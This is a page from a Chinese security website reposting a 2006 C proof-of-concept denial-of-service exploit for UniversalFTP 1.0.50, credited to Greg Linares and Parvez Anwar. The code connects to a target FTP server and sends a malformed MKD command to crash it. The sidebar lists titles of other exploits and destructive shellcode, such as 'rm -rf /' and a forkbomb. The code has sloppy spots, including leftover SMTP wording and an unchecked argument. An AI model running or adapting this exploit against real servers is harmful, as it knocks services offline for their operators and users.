首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
UniversalFTP 1.0.50 (MKD) Remote Denial of Service Exploit
来源:glinares.code[at]gmail[dot]com 作者:Greg 发布时间:2006-11-20  

/*
=============================================================
DoS Exploit for UniversalFTP version 1.0.50
=============================================================
UniversalFTP (www.teamtek.net)
http://www.5e5.net/cgi-bin/download3.asp
Suffers from several unhandled user input vulnerabilities that
cause the program to crash.

I originally found this vulnerability on October 27th and wrote
this but got caught up working with the Renasoft PSS Exploit
and forgot to report it.

The vulnerability was posted to secunia by Parvez Anwar November
13th - good job and thanks to him :).

*/

#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>

#define BUFF_SIZE 1024

#pragma comment(lib,"wsock32.lib")

int main(int argc, char *argv[])
{
WSADATA wsaData;
char buffer[BUFF_SIZE];

struct hostent *hp;
struct sockaddr_in sockin;
char buf[300], *check, *cmd;
int sockfd, bytes;
int i;
char *hostname;
unsigned short port;

if (argc <= 1)
{
printf("\n==================================================================\n");
printf("UniversalFTP v1.0.50 Denial Of Service PoC Code\n");
printf("Discovered By: Parvez Anwar and Greg Linares (glinares.code
[at ] gmail [dot] com)\n");
printf("Original Reported By: Parvez Anwar\n");
printf("Usage: %s [hostname] [port]\n", argv[0]);
printf("default port is 21 \n");
printf("====================================================================\n");
exit(0);
}

cmd = argv[3];
hostname = argv[1];
if (argv[2]) port = atoi(argv[2]);
else port = atoi("21");

if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
{
fprintf(stderr, "Error setting up with WinSock v1.1\n");
exit(-1);
}


hp = gethostbyname(hostname);
if (hp == NULL)
{
printf("ERROR: Uknown host %s\n", hostname);
printf("%s",hostname);
exit(-1);
}

sockin.sin_family = hp->h_addrtype;
sockin.sin_port = htons(port);
sockin.sin_addr = *((struct in_addr *)hp->h_addr);

if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
{
printf("ERROR: Socket Error\n");
exit(-1);
}

if ((connect(sockfd, (struct sockaddr *) &sockin,
sizeof(sockin))) == SOCKET_ERROR)
{
printf("ERROR: Connect Error\n");
closesocket(sockfd);
WSACleanup();
exit(-1);
}

printf("Connected to [%s] on port [%d], sending exploit....\n",
hostname, port);


if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
{
printf("ERROR: Recv Error\n");
closesocket(sockfd);
WSACleanup();
exit(1);
}

// wait for SMTP service welcome

buf[bytes] = '\0';
check = strstr(buf, "2");
if (check == NULL)
{
printf("ERROR: NO response from SMTP service\n");
closesocket(sockfd);
WSACleanup();
exit(-1);
}
printf("%s\n", buf);

char Exploit[] = "MKD \\..\\******\\|\\******";


send(sockfd, Exploit, strlen(Exploit),0);
Sleep(1000);
printf("[*] FTP DoS Packet Sent\n");

closesocket(sockfd);
WSACleanup();
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·WinZIP <= 10.0.7245 (FileVi
·linux/x86 execve(rm -rf /) she
·Kerio WebSTAR 5.4.2 (libucache
·linux/x86 forkbomb 7 bytes
·WinZIP <= 10.0.7245 (FileVi
·linux/x86 chmod 0666 /etc/shad
·Links 1.00pre12 (smbclient) Re
·linux/x86 set system time to 0
·CMSmelborp Beta (user_standard
·linux/x86 /sbin/ipchains -F 41
·ASPPortal <= 4.0.0 (default
·MS Windows NetpManageIPCConnec
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved